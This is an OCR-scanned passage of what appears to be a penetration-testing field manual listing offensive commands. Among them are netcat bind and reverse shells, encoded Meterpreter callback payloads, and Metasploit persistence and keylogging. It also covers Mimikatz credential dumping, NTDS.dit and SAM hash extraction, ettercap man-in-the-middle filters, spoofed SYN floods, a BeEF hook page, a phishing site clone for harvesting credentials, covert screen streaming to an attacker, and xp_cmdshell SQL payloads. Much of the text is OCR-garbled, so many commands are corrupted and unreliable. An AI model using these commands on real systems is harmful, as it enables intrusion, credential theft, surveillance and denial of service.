xsltproc nmap.xml -o nmap.html

GENERATE LIVE HOST FILE:
nmap -sP -n -oX out.xml 1.1.1.0/24 2.2.2.0/24
5
live hosts.txt

I grep "Nmap" I cut -d " " -f

COMPARE NMAP RESULTS
ndiff scanl.xml scan2.xml

DNS REVERSE LOOKUP ON IP RANGE
nmap -R -sL -dns-server

IDS TEST

server

1.1.1.0/24

(XMAS SCAN WITH DECOY IPS AND SPOOFING)

for x in {l .. lOOOO .. l);do nmap -T5 -sX -S spoof-source-IP -D commaseperated with no spaces list of decoy IPs --spoof-mac aa:bb:cc:dd:ee:ff e ethO -Pn targeted-IP. ;done
51

WIRE SHARK
eth.addr/eth.dst.eth.src
rip.auth.passwd
ip.addr/ip.dst/ip.src (ipv6.)
tcp.port/tcp.dstport/tcp.srcport
tcp.flags (ack,fin,push,reset,syn,urg)
udp.port/udp.dstport/udp.srcport
http.authbasic
http.www_authentication
http.data
http.cookie
http.referer
http.server
http.user agent
wlan.fc.type eq 0
wlan.fc.type eq 1
wlan.fc.type eq 0
wlan.fc.type subtype eq 0 (1~reponse)
wlan.fc.type_subtype eq 2 (3~response)
wlan.fc.type_subtype eq 4 (S~response)
wlan.fc.type_subtype eq 8
wlan.fc.type subtype eq 10
wlan.fc.type=subtype eq 11 (12~deauthenticate)

COMPARISON OPERATORS
eq OR
ne OR
gt OR
l t OR
ge OR
le OR

!~

LOGICAL OPERATORS
and OR &&
or OR II
xor OR
not OR !

52

MAC
RIP password
IP
TCP ports
TCP flags
UDP ports
Basic authentication
HTTP authentication
HTTP data portion
HTTP cookie
HTTP referer
HTTP Server
HTTP user agent string
802.11 management frame
802.11 control frame
802.11 data frame
802.11 association request
802.11 reassociation req
802.11 probe request
802.11 beacon
802.11 disassociate
802.11 authenticate

NET CAT

BAs :res
Connect to [TargetiP] Listener on [port]:
$ nc [ Targeti P] [port]
Start Listener:
$ nc -1 -p [port]

PORT SCANNER
TCP Port Scanner in port range [startPort] to [endPort]:
$ nc -v -n -z -wl [TargetiP] [startPort]-[endPort]

Fl:LE TRANSFERS
Grab a [filename] from a Listener:
1.
Start Listener to push [filename]
$ nc -1 -p [port]
[filename]
2.
Connect to [TargetiP] and Retrieve [filename]
$ nc -w3 [TargetiP] [port]
[filename]
Push a [filename] to Listener:
Start Listener to pull [filename]
1.
$ nc -1 -p [port]
[filename]
Connect to [TargetiP] and push [filename]
2.
$nc -w3 [TargetiP] [port]
[filename]

BACKDOOR SHELLS
Linux Shell:
$ nc -1 -p [port] -e /bin/bash
Linux Reverse Shell:
$ nc [LocaliP] [port] -e /bin/bash
Windows Shell:
$ nc -1 -p [port] -e cmd.exe
Windows Reverse Shell:
$ nc [LocaliP] [port] -e cmd.exe

53

VLC STREAMING
# Use cvlc (command line VLC) on target to mitigate popups
CAPTURE AND STREAM THE SCREEN OVER

UDP

TO :

1234

# Start a listener on attacker machine
vlc udp://@:1234

OR # Start a listener that stores the stream in a file.
vlc udp://@:1234 :sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,
ab=128,channels=2,samplerate=44100):file{dst=test.mp4) :no-sout-rtp-sap
:no-sout-standard-sap :ttl=1 :sout-keep
# This may make the users screen flash. Lower frame rates delay the video.
vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):udp{dst= attackerip :1234) :no-sout-rtp-sap :no-soutstandard-sap :ttl=1 :sout-keep
CAPTURE AND STREAM THE SCREEN OVER HTTP

# Start a listener on attacker machine
vlc http://server.example.org:BOBO

-- OR # Start a listener that stores the stream to a file
vlc http://server.example.org:BOBO -sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,samp
lerate=44100):file{dst=test.mp4)
# Start streaming on target machine
vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):http{mux=ffmpeg{mux=flv),dst=:8080/) :no-sout-rtp-sap :nosout-standard-sap :ttl=1 :sout-keep
CAPTURE AND STREAM OVER BROADCAST

# Start a listener on attacker machine for multicast
vlc udp://@ multicastaddr :1234
# Broadcast stream to a multicast address
vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):udp{dst= multicastaddr :1234) :no-sout-rtp-sap :no-soutstandard-sap :ttl=1 :sout-keep
CAPTURE AND RECORD YOUR SCREEN TO A F:ILE

vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):file{dst=C:\\Program Files (x86)\\VideoLAN\\VLC\\test.mp4)
:no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep
CAPTURE AND STREAM THE M:ICROPHONE OVER UDP
vlc dshow:// :dshow-vdev= 11 None" :dshow-adev="Your Audio Device 11
54

SSH
/etc/ssh/ssh known hosts
-/.ssh/known=hostssshd-generate
ssh keygen -t dsa -f /etc/ssh/ssh host dsa
ssh keygen -t rsa -f /etc/ssh/ssh=host=rsa
~

~
~

#System-wide known hosts
#Hosts user has logged into
#Generate SSH keys (DSA/RSA)
key
#Generate SSH DSA keys
key
#Generate SSH RSA keys

If already in ssh session, press SHIFT -C to configure tunnel
Port forwarding must be allowed on target
/etc/ssh/sshd_config - AllowTcpForwarding YES

TO ESTABLISH AN SSH CONNECTION ON DIFFERENT PORT
ssh root@2.2.2.2 -p 8222

SETUP

Xll

FORWARDING FROM TARGET, FROM ATTACK BOX RUN

xhost+
vi -/.ssh/config- Ensure 'ForwardXll yes'
ssh -X root@2.2.2.2

REMoTE PORT FORWARD ON

808 0 ,

FORWARD TO ATTACKER ON

4 43

ssh -R8080:12-.0.0.1:443 root@2.2.2.2.

LoCAL PORT FORWARD ON PORT
THROUGH SSH TUNNEL TO PORT

8080
3300

ON ATTACK BOX AND FORWARDS
ON INTERNAL TARGET

3. 3. 3. 3

ssh -18080:3.3.3.3:443 root@2.2.2.2

DYNAMIC TUNNEL USED IN CONJUNCTION WITH PROXYCHAINS .

ENSURE

/ETC/PROXYCHAINS. CONF IS CONFIGURED ON CORRECT PORT

(1080)

ssh -Dl080 root@2.2.2.2
In a separate terminal run:
proxychains nmap -sT -p80,443 3.3.3.3

55

METASPLOIT
msfconsole r file.rc
msfcli I grep exploit/window
rnsfencode 1
msfpayload h
show exploits
show auxiliary
show payloads
search string
info module
use module
show options
show advanced
value
set option
sessions -v

Load resource file
List Windows exploits
List available encoders
List available payloads
Display exploits
Display auxiliary modules
Display payloads
Search for string
Show module information
Load exploit or module
Displays module options
Displays advanced options
Sets a value
List session: -k # (kill)
-u # (upgrade to Meterpreter)
Run Meterpreter script on all
sessions
List all jobs (-k # - kill)
Run exploit as job
Pivoting
Load 3rd party tree
Live Ruby interpreter shell
SSL connect (NC clone I
Add route ·through session (pivot)
Advanced option allows for multiple
shells
Enables logging

sessions -s script
jobs -1
exploit -j
nmask
route add ip
sid
loadpath /home/modules
irb
connect -s ip 443
route add ip
mask
session id
exploit/multi/handler set
ExitOnSession False
set ConsoleLogging true (also
SessionLogging)

CREATE ENCODED METERPRETER PAYLOAD

(FOR

LINUX:

-T ELF

-o

CALLBACK)
./msfpayload windows/meterpreter/reverse tcp LHOST~ ip LPORT~ port
./msfencode -t exe -o callback.exe -e x86/shikata_ga nai -c 5

CREATE BIND METERPRETER PAYLOAD
./msfpayload windows/meterpreter/bir.d_tcp
cb.exe

RP.OST~

ip

LPORT~

port

X

CREATE ENCODED PAYLOAD USING MSFVENOM USING EXE TEMPLATE
./msfvenorn --payload windows/meterpreter/reverse~tcp --format exe
template calc.exe -k --encoder x86/shikata ga nai -i 5 LHOST~l.l.l.l
LPORT~443
callback.exe

56

R I

START MSF DB

(BT5

=

MYSQL,

KAL:r =

POSTGRESQL)

/etc/rc.d/rc.mysqld start
msf db_create root:pass@localhost/metasploit
msf load db mysql
msf db connect root:pass@localhost/metasploit
msf db=import nmap.xml
Kali --# service postgresql start
# service metasploit start

PASS A SHELL
msf
msf
msf
msf
msf
msf

use
set
set
set
set
set

(BY DEFAULT WJ:LL LAUNCH NOTEPAD AND :INJECT)

post/windows/manage/multi meterpreter inJect
IPLIST attack ip
LPORT callback port
PIDLIST PID to inject, default creates new notepad
PAYLOAD windows/meterpreter/reverse_tcp
SESSION meterpreter session ID

HTTP BANNER SCAN ON :INTERNAL NETWORK
msf
msf
msf
msf
msf
msf

route add ip/range
netmask
meterpreter ID
use post/multi/gather/ping sweep
# Set options and run
use /auxiliary/scanner/portscan/tcp
# Set options and run
hosts-u-S x.x.x -R
#Searches for x.x.x.' and sets
# RHOSTS
use auxiliary/scanner/http/http version
# Set options and run
services -v -p 80-S x.x.x -R #Displays IPs x.x.x.' with port
# 80 open

57

METERPRETER
List available commands
Display system info
List processes
List current PID
Upload file
Download file
Interact with registry
Revert to original user
Drop to interactive shell
Migrate to another PID
Background current session
Start/Stop/Dump keylogger
Execute cmd.exe and interact
Execute cmd.exe as hidden process
and with all tokens
Dumps local hashes
Executes script
(/scripts/meterpreter)
Port forward 3389 through session.
Rdesktop to local port 443

help
sysinfo
ps
getpid
upload file C:\\Program\ Files\\
download file
reg command
rev2self
shell
migrate PID
background
keys can (startjstopjdumpj
execute -f cmd.exe -i
execute -f crnd.exe -i -H -t
has dump
run script
port fwd [add I delete] L 1r.o.o.1
443 -r 3.3.3.3 -p 3389

1

PRIVILEGE ESCALATION
use priv
getsystem

IMPERSONATE TOKEN (DROP TOKEN WILL STOP IMPERSONATING)
use incognito
list tokens -u
impersonate token domain\\user

NMAP
1.
2.
3.
4.
5.

6.

THROUGH METERPRETER SOCKS PROXY
msf
msf
msf

sessions
#Note Meterpreter ID
route add 3.3.3.0 255.255.255.0 id
use auxiliarJ/server/socks4a

rnsf

run

Open new shell and edit /etc/proxychains.conf
i.
#proxy_ dns
ii.
#socks4 1r.0.0.1
9050
iii.
socks4
1. 1.1.1 1080
Save and Close conf fi:e
proxychains nmap -sT -Pn -p80,:35,s45 3.3.3.3

RAILGUN - WINDOWS API CALLS TO POP A MESSAGE BOX
irb
client. railgun. user32. t.jessageBoxA ( 0, "got", 11 JOU", "HB ~OK")

rneterprete~

58

I

CREATE PERSXSTENT WrNDOWS SERVICE
msf
msf·
msf
msf.
msf.·
msf
msf.

use
set
set
set
set
set
set

post/windows/manage/persistence
LHOST attack ip
LPORT callback port
PAYLOAD_TYPE TCPIHTTPIHTPS
REXENAHE filename
SESSION meterpreter session id
STARTUP SERVICE

GATHER RECENTLY ACCESSED FXLES AND WEB LXNKS
meterpreter

run post/windows/gather/dumplinks

SPAWN NEW PROCESS AND TREE C: \
execute -H -f cmd.exe -a '/c tree /F /A c:\

59

C:\temp\tree.txt'

ETTERCAP
~-IN-THE-MIDDLE WITH FILTER

ettercap.exe -I iface -M arp -Tq -F file.ef MACs I IPs I Ports
t1ACs I IPs I Ports
#i.e.: I 180,443 I I ~ anJ t1AC, anj IP, ports 80,443
~-IN-THE-MIDDLE ENTIRE SUBNET WITH APPLIED FILTER

ettercap -T -M arp -F

II II

filter

SWITCH FLOOD
ettercap -TP rand flood

ETTERCAP FILTER

COMPILE ETTERCAP FILTER
etterfilter filter.filter -o out.ef

SAMPLE FILTER if lip.proto
drop I I;
hllll;

~~

KILLS VPN TRAFFIC AND DECODES HTTP TRAFFIC

UDP && udp.dst

~~

500) I

}

if I ip. src ~~ ' ip ' ) (
if ltcp.dst ~~ 80) (
if lsearchiDATA.data, "Accept-Encoding")) (
replace("Accept-Encoding","Accept-Rubbish!");
rnsg(''Replaced Encoding\n'');

60

MIMIKATZ
1.
2.
3.
4.
5.

Upload mimikatz.exe and sekurlsa.dll to target
execute mirnikatz
mimikatz# privilege: :debug
mimikatz# injeet::proeess lsass.exe sekurlsa.dll
mimikatz# @getLogonPasswords

HPING3
DoS

FROM SPOOFED

hping3

targetiP

IPs
--flood --frag --spoof

ip

--destport

#

--syn

ARPING
ARP SCANNER
./arping -I eth# -a

# arps

WINE
COMPILE

EXE IN

BACKTRACK

ed /root/.wine/drive e/HinGW/bin
wine gee -o file.exe /tmp/ eode.e
wine

file.exe

GRUB
CHANGE ROOT PASSWORD
GRUB Henu:Add 'single' end of kernel line. Reboot. Change root pass. reboot

HYDRA
ONLINE BRUTE FORCE
hydra -1 ftp -P words -v

targetiP

ftp

61

JOHN THE RIPPER
CRACKING WITH A WORDLIST
$ ./john -wordfile:pw.lst -format: format

hash.txt

FORMAT EXAMPLES
john
john
john
$ john

--format~des

username:SDbsuge8iC58A

--format~lm

username:$L~$a9c604d244c4e99d

--format~md5

$1$12345678$aiccj83HRD8o6ux1bVx"D1

--format~raw-sha1

A9993E364-06816A8A3E25"1-850C26C9CDOD89D

# For --format~netlmv2 replace $NETLM with $NETLMv2
$ john --format~netlm
$NETLt1$112233445566""88$0836F0858124F338958-5F81951905DD2F85252CC-318825
username:$NETLt1$ll2233445566""88$0836F0858124F338958"5F81951905DD2F85252CC"
318825
username:$NETLt1$112233445566""88$0836F0858124F338958-5F81951905DD2F85252CC"
318825:::::::
# Exactly 36 spaces between USER and HASH (SAP8 and SAPG)
$ john --format~sapb
ROOT
$8366A4E9E68"2C80
username:ROOT
$8366A4E9E68"2C80
$ john --format~sapg
$1194E38F1489F3F8DA18181F14DE8"0E"8DCC239
ROOT
username:ROOT
$1194E38F1489F3F8DA18181F14DE8-0E-8DCC239
$ john --format~sha1-gen
$SHA1p$salt$59b3e8d63-cf9"edbe2384cf59cb"453dfe30-89
username:$SHA1p$salt$59b3e8d63-cf9"edbe2384cf59cb-453dfe30-89
$ john --format~zip
$zip$'0'1'8005b1b"d07""08d'dee4
username:$zip$'0'1'8005b1b-d0"-"08d'dee4

PASSWORD WORDLIST
GENERATE WORDLIST BASED OFF SINGLE WORD
#Add lower(@), upper(,), ~umber(%), and symbol( I to the end of the word
crunch 12 12 -t baseword@,%'
wordlist.txt
Use custom special character set and add 2 numbers then special character
maskprocessor -custom-charset1~\!\@\#\$ baseword?d?d?l
wordlist.txt

62

VSSOWN
1.
2.

3.

Download: http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs
Create a new Shadow Copj
a.
cscript vssown.vbs /start (optional)
b.
cscript vssown.vbs /create
Pull the following files frorr. a shadow copj:
a.
COpj
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopj[X]\windows\
ntds\ntds.dit .
b.
copj
\\?\GLOBALROOT\Device\Harddisf:VolumeShadowCopj[X]\windows\
Sjstem32\config\SYSTEM .
C.

4.
5.
6.

8.

9.

10.

[2l

COpj

\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopj[X]\windows\
sjstem32\con:'ig\SAt1 .
Copj files to attack box.
Download tools: http://www.ntdsx~ract.com/downloads/ntds dump_hash.zip
Configure and Make source code for libesedb from the extracted package
a.
cd libesedb
b.
chmod +x configure
c.
./configure && make
Use esedbdumphash to ex~ract the datatable from ntds.dit.
a.
cd esedbtools
b.
. I esedbdumphash .. I . . I ntds. di t
8a.Use dsdump.pj to dump hashes from datatable using bootkej from
SYSTEt1 hive
a.
cd .. I . . I creddump/
b.
pjthon . /dsdurr.p.pj .. /SYSTEtc
.. /libesedb/esedbtools/ntds.dit.export/datatable
8b.Use bkhive and samdump2 to dump hashes from SN1 using bootkej from
SYSTEt1 hive.
a.
bkhive SYSTEM kej.txt
b.
samdump2 SN1 kej. txt
Dump historical hashes
a.
pjthon ./dsdumphistorj.pj .. /sjstem
.. /libesedb/esedbtools/ntds.dit.export/datatable

63

FILE HASHING
HASH LENGTHS
t1D5
SHA-1
SHA-256
SHA-512

16 b:~tes
20 b:~tes
32 b:~tes
64 bjtes

SOFTWARE HASH DATABASE
http://isc.sans.edu/tools/hashsearch.htm~

# dig +short

Result

=

''

md5 .md5.dshield.org TXT

filename

I

source '' i.e. ''cmd.exe I NIST''

MALWARE HASH DATABASE
http: I /www. team-c:~mru. org/ Services/t1HR
# dig +short [t1D51 SHA-1] .malware.hash.cjmrc.J.com TXT
Result = last seen timestamp
AV detection rate
Convert timestamp= perl-e 'print scalar localtime( timestamp ) , ''\n'''

FILE METADATA SEARCH
https://fileadvisor.bit9.com/services/search.aspx

SEARCH VIRUSTOTAL DATABASE
https://www.virustotal.com/#search

64

COMMON USER-AGENT STRINGS
Mozilla/4.0 (compatible; MSIE 6.0; Windows
NT 5.1; SV1)
Mozilla/ 4. 0 (compatible; l~SIE 7. 0; Windows
NT 5.1; SV1; .NET CLR 2.0.50-2 7 )
Mozilla/4.0 (compatible; MSIE 8.0; Windows
NT 6.0; Trident/4.0; Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1)
; .NET CLR 3.5.30 7 29)
Mozilla/ 5. 0 (compatible; t~SIE 9. 0; Windows
NT 6.1; Trident/5.0)
Mozilla/5.0 (compatible; t~SIE 9.0; Windows
NT 6.1; WOW64; Trident/5.0)

IE 6.0/WinXP 32-bit

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0)
Gecko/20100101 Firefox/5.0
Mozilla/5.0 (Windows NT 5.1; rv:13.0)
Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:1'.01
Gecko/20100101 Firefox/1'.0
Mozilla/5.0 (X11; Ubuntu; Linux x86 64;
rv:17.0) Gecko/20100101 Firefox/1-.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.-;
rv: 17. 0) Gecko/20100101 Firefox/1 7 .0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;
rv:17.0) Gecko/20100101 Firefox/1'.0

Firefox

Mozilla/5.0 (Windows NT 5.1)
AppleWebKit/53'.11 (KHTML, like Gecko)
Chrome/23.0.1271.9- Safari/53-.11
Mozilla/5.0 (Windows NT 6.1)
AppleWebKit/53 7 .11 (KHTl~L, like Gecko)
Chrome/23.0.12-1.9- Safari/53-.11
Mozilla/5.0 (X11; Linux x86 64)
AppleWebKit/53' .11 (KHTl~L, like Gecko)
Chrome/23.0.1271.9' Safari/53 7 .11
Mozilla/5.0 (Macintosh; Intel Mac OS X
10 8 2) AppleWebKit/537.11 (KHTML, like
Ge~ko) Chrome/23.0.12-1.101 Safari/53'.11
Mozilla/5.0 (Windows NT 6.1; WOW64)
AppleWebKit/535.1 (KHTML, like Gecko)
Chrome/13.0.782.112 Safari/535.1

Chrome Generic/WinXP

Mozilla/5.0 (Macintosh; Intel Mac OS X
10 ~ 5) AppleWebKit/536.26.17 (KHTML, like
Ge~ko) Version/6.0.2 Safari/536.26.17

Safari 6.0/MacOSX

Mozilla/5.0 (iPad; CPU OS 6 0 1 like Mac OS
X) AppleWebKit/536.26 (KHTML,-like Gecko)
Version/6.0 Mobile/10A523 Safari/8536.25
Mozilla/5.0 (iPhone; CPU iPhone OS 6 0 1
like l~ac OS X) AppleWebKit/536.26 (KHTML,
like Gecko) Version/6.0 Mobile/10A523
Safari/8536.25
Mozilla/5.0 (Linux; U; Android 2.2; fr-fr;
Desire A8181 Build/FRF91) App3leWebKit/53.1
(KHTl~L-;- like Gecko I Version/ 4. 0 Mobile
Safari/533.1

Mobile Safari 6.0/iOS

67

IE

~.0/WinXP

32-bit

IE 8.0/WinVista 32-bit

IE 9.0/Win- 32-bit
IE 9.0/Win- 64-bit

5.0/Win~

64-bit

Firefox 13.0/WinXP 32-bit
Firefox 1'.0fWin~ 64-bit
Firefox 1-.o/Linux
Firefox 1'.0fMacOSX 10.Fire fox 1'. Ofl~acOSX 10.8

Chrome Generic/Win'

Chrome Generic/Linux

Chrome

Generic/l~acOSX

Chrome 13.0/Win' 64-bit

(iPad)

Mobile Safari 6.0/iOS
(iPhone)

Hobile Safari 4.0/Android

HTML
HTML

BEEF HOOK WITH EMBEDDED FRAME

!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
html
head.
title Campaign Title· /title
script
var commandModuleStr = ' script src= 111 + window.location.protocol +
'II' + window. location. host + ':8080/hook.js"
type="text/javascript" \/script.';
document.write(commandModuleStr);
//Site refresh=window.setTimeout(function() {window.location.href='http://ww
w.google.com/'},20000);
/script.
/head
frameset rows="*,lpx"
frame src="http://www.google.com/" frameborder=O
noresize=''noresize'' I
frame src=''/e'' frarneborder=O scrolling=no noresize=noresize ; ,
/frameset
/html

EMBEDDED JAVA APPLET

(*

PLACE WITHIN  TAG)

applet archive=''legit.jar'' code=''This is a legit applet'' width=''l''
height="l"
/applet

EMBEDDED IFRAME
iframe src="http://1.1.1.1 11 width="O" height="O" frameborder="O"

tabindex=''-1'' title=''ernpty'' style=visibility:hidden;display:none''
/iframe

FIREFOX TYPE CONVERSIONS
ASCII
Base64
ASCII
URI

Base64
ASCII
URI
ASCII

javascript:btoa(''ascii str'')
javascript:atob("base64==")
javascript:encodeURI('' ·script ''}
javascript:decodeURI("%3cscript%3E")

WGET
CAPTURE SESSION TOKEN
wget -q --save-cookies=cookie.txt --keep-session-cookies --postdata="username: admin&password=pass&Login=Login" http: I I .. url ,. I login. php

68

CURL
GRAB HEADERS AND SPOOF USER AGENT

curl -I -X HEAD -A
http:// ip

"t~ozilla/5.0

(compatible; HSIE ".01; Windows NT 5.0)"

SCRAPE SXTE AFTER LOGXN

curl -u user:pass -o outfile https://login.bob.com

FTP
curl ftp://user:pass@bob.com/directory/
SEQUENTXAL LOOKUP

curl http://bob.com/file[l-10] .txt

BASIC AUTHENTICATION USING APACHE2
The steps below will clone a website and redirect after 3 seconds to
another page requiring basic authentication. It has proven very useful for
collecting credentials during social engineering engagements.
Start Social Engineering Toolkit (SET)
/pentest/exploits/set/./set
2.
Through SET, use the 'Website Attack Vector' menu to clone your
preferred website. ' Do not close SET '
3.
In a new terminal create a new directory (lowercase L)
mkdir /var/www/1
4.
Browse to SET directory and copy the cloned site
cd /pentest/exploits/set/src/web clone/site/template/
cp index.html /var/www/index.html
cp index.html /var/www/1/index.html
5.
Open /var/www/index.html and add tag between head tags
meta http-equiv=''refresh''
content-"3;url-http:// domainlip /1/index.html"/
6.
Create blank password file to be used for basic auth
touch /etc/apache2/.htpasswd
Open /etc/apache2/sites-available/default and add:
Directory /var/www/1
AuthType Basic
AuthName "PORTAL LOGIN BANNER"
AuthUserFile /etc/apache2/.htpasswd
Require user test
/Directory
8.
Start Apache2
/etc/init.d/apache2 start
9.
Start Wireshark and add the filter:
http.authbasic
10. Send the following link to your target users
http:// domainlip /index.html
1.

69

AUTOMATED WEB PAGE SCREENSHOTS
NMAP WEB PAGE SCREENSHOTS[9]
Install dependencies:
wget http://wkhtmltopdf.googlecode.com/files/wkhtmltoimage-0.11.0 rc1static-i386.tar.bz2
tar -jxvf wkhtmltoimage-0.11.0 rc1-statlc-i386.tar.bz2
cp wkhtmltoimage-i386 /usr/local/bin/
Install Nmap module:
git clone git://github.com/SpiderLabs/Nmap-Tools.git
cd Nmap-Tools/NSE/
cp http-screenshot.nse /usr/local/share/nmap/scripts/
nmap --script-updatedb
OS/version detection using screenshot script (screenshots saved as .png):
nmap -A -script=http-screenshot -p80,443
1.1.1.0/24 -oA nmapscreengrab
Script will generate HTML preview page with all screenshots:
#!/bin/bash
printf " HTHL.- BODY BR "
preview.html
ls -1 '.png I awk -F : ' {print $1":"$2"\n BR- IMG SRC=\""$1"%3A"$2"\"
width=400 BR BR ")'
preview. html
printf " /BODY /HTML. "
preview. html

PEEPINGTOM WEB PAGE SCREENSHOTS
Install Dependencies:
Download Phantomjs
https://phantomjs.googlecode.com/files/phantomjs-1.9.2-linux-x86_64.tar.bz2
Download PeepingTom
git clone https://bitbucket.org/LaNMaSteR53/peepingtom.git
Extract and copy phantomjs from phantomjs-1.9.2-linux-x86 64.tar.bz2 and
copy to peepingtom directory
Run PeepingTom
python peepingtom.py http:// mytarget.com

70

SQLMAP
GET REQUEST
./sqlmap.py -u "http:// url ?id=1&str=val"

POST REQUEST
./sqlmap.py -u "http:// url " --data="id=1&str=val"

SQL INJECTION AGAINST SPECIFIC PARAMETER WITH DB TYPE SPECIFIED
./sqlmap.py -u ''http:// url '' --data=''id=l&str=val'' -p ''id''
-b --dbms=" mssqllmysqlloraclelpostgres "

SQL INJECTION ON AUTHENTICATED SITE
1.
Login and note cookie value (cookie1=val1, cookie2=val2)
./sqlrnap.py -u ''http://· url '' --data=''id=l&str=val'' -p ''id''
--cookie=''cookiel=vall;cookie2=val2''

SQL INJECTION AND COLLECT DB VERSION 1 NAME 1 AND USER
./sqlmap.py -u "http:// url " --data="id=1&str=val" -p "id" -b --current-db
--current-user

SQL INJECTION AND GET TABLES OF DB=TESTDB
./sqlmap.py -u "http:// url " --data="id=1&str=val" -p "id" --tables -D
testdb 11

11

•

SQL INJECTION AND GET COLUMNS OF USER TABLE
./sqlrnap.py -u "http:// url " --data="id=l&str=val" -p "id 11 --columns -T
"users"

71

_,

N

MS-SQL
SELECT @@version
EXEC xp_msver
EXEC master .. xp_cmdshell 'net user'
SELECT HOST_ NA11E ()
SELECT DB_NA11E I)
SELECT name FROM master .. sysdatabases;
SELECT user name()
SELECT name FROM master .. sjslogins
SELECT name FROM master .. sjsobjects WHERE
Xtjpe= 'U';
SELECT name FROM SjScolumns WHERE id-(SELECT
id FR0t1 SJSObj ects WHERE name- 'mjtable' ) ;

DB version
Detailed version info
Run OS command
Hostname & IP
Current DB
List DBs
Current user
List users
List tables
List columns

SYSTEM TABLE CONTAINING INFO ON ALL TABLES
SELECT TOP 1 TABLE NAME FROl1 INFORl1ATION SCHEt1A. TABLES

LIST ALL TABLES/COLUMNS
SELECT name FROl-1 Sjscol-:;:r.ns WHERE id

(SELECT id FROM Sjsobjects WHERE

name= 'mjtable')
PASSWORD HASHES

(2005)

SELECT name, password hash FROM master.sjs.sgl logins

POSTGRES

SELECT
SELECT
SELECT
SELECT
SELECT
SELECT

Hostname & IP
Current DB
List DBs
Current user
List users
List password hashes

inet server_addr()
current database();
datname FROM pg database;
user;
username FROM pg_user;
username,passwd FROM pg shadow

LIST COLUMNS
SELECT relname, A.attnaxe FROl1 pg_class c, pg_namespace N, pg_attribute A,
pg_tjpe T WHERE (C.relkind-'r') AND (~.oid-C.relnamespace) AND
(A.attrelid-C.oid) AND (A.atttjpid-T.oid) AND (A.attnum 0) AND (NOT
A.attisdropped) AND (N.nspname ILIKE 'public')

LIST TABLES
SELECT c.relname FROM pg_catalog.pg_class cLEFT JOIN
pg catalog.pg namespace n ON n.old - c.relnamespace WHERE c.relkind IN
( 'r','') AND n.nspnarne NOT IN ( 'pg catalog', 'pg toast') AND
pg catalog.pg table is visible(c.;id)

~3

MYSQL
SELECT
SELECT
SELECT
SELECT
SELECT
SELECT
SELECT

@@version;
@@hostname;
database();
distinct (db) FROl1 mjsql.db;
user();
user FROM mJsql.user;
host,user,password FROM mJsql.user;

LIST ALL TABLES

DB version
Hostname & IP
Current DB
List DBs
Current user
List users
List password hashes

& COLUMNS

SELECT table schema, table name, column_ name FR0t1
information scherna.columns WHERE
table schema != 'rnysql' AND table schema != 'information schema'

EXECUTE OS COMMAND THROUGH MYSQL
osql -S
passr''

ip , port

-U sa -P pwd -Q "exec xp cmdshell

'net user /add user

READ WORLD-READABLE FILES
UNION ALL SELECT LOAD FILE( '/etc/passwd');

WRITE TO FILE SYSTEM
SELECT '

FROl1 mjtable INTO dumpfile '/tmp/ somefile';

ORACLE
SELECT
SELECT
SELECT
SELECT
SELECT
SELECT
SELECT

• FROM v$version;
version FROM v$instance;
instance name FROM v$instance;
name FROM v$database;
DISTINCT owner FROM all tables;
user FROM dual;
username FROM all users ORDER BY

DB version
DB version
Current DB
Current DB
List DBs
Current user
List users

username;
SELECT column name FR0l1 all tab columns;
SELECT table name FROM all tables;
SELECT name, -password, astatus FROt1 SJS.user$;

List columns
List tables
List password hashes

LIST DBAs
SELECT DISTINCT grantee FR0t1 dba SfS_prlvS WHERE ADlHN OPTION

'4

I

YES I;

-l

"'

PYTHON
PYTHON PORT SCANNER
import socket as sk
for port in range (1, 1024):
trj:
s~sk. socket ( sk .AF_ INET, sk. SOCK_ STRE.Z\t1)
s.settimeout(1000)
s. connect ( (' 12~. 0. 0. l ' , port) )
print '%d:OPEN' % (port)
s.close
except: continue

PYTHON BASE64 WORDLIST
#!/usr/bin/pjthon
import base64

filel=open(''pwd.lst'',''r'')
file2=open(''b64pwds.lst'',''w'')
for line in filel:

clear= "administrator:"+ str.strip(line)
new= base64.encodestring(clear)
file2.write(new)

CONVERT WINDOWS REGISTRY HEX FORMAT TO READABLE ASCII
import binascii,

SJS,

string

dataFormatHex ~ binascii.a2b hex(SJS.argv[i])
output = ''''
for char in dataFormatEex:
if char in string.printable: output += char
1 else: output += ''.''

• print ''\n'' + output

READ

ALL FILES IN FOLDER AND SEARCH FOR REGEX

import glob, re
for msg in glob.glob('/tmp/' .txt'):
filer ~ open I (msg), 'r' I
data ~ fi1er.read()
message= re.findall(r' message (.'?) /message ',
print ''File %s contains %s'' % (str(msg) ,message)
fi1er.c1ose()

data,re.DOTALL)

SSL ENCRYPTED SIMPLEHTTPSERVER
Create SSL cert (follow prompts for customization)
openssl req -new -x509 -keyout cert.pem -out cert.pern -days 365 -nodes
Create httpserver.pj
import BaseHTTPServer,SimpleHTTPServer,ssl
cert

=

''cert.pem''

httpd ~ BaseHTTPServer.HTTPServer( ('192.168.1.10' ,443),
Simp1eHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap socket(httpd.socket,certflle=cert,server side=True)
httpd.serve forever()

PYTHON HTTP SERVER
python -m SimpleHTTPServer 8080

PYTHON EMAJ:L SENDER (

*

SENDMAJ:L MUST BE INSTALLED)

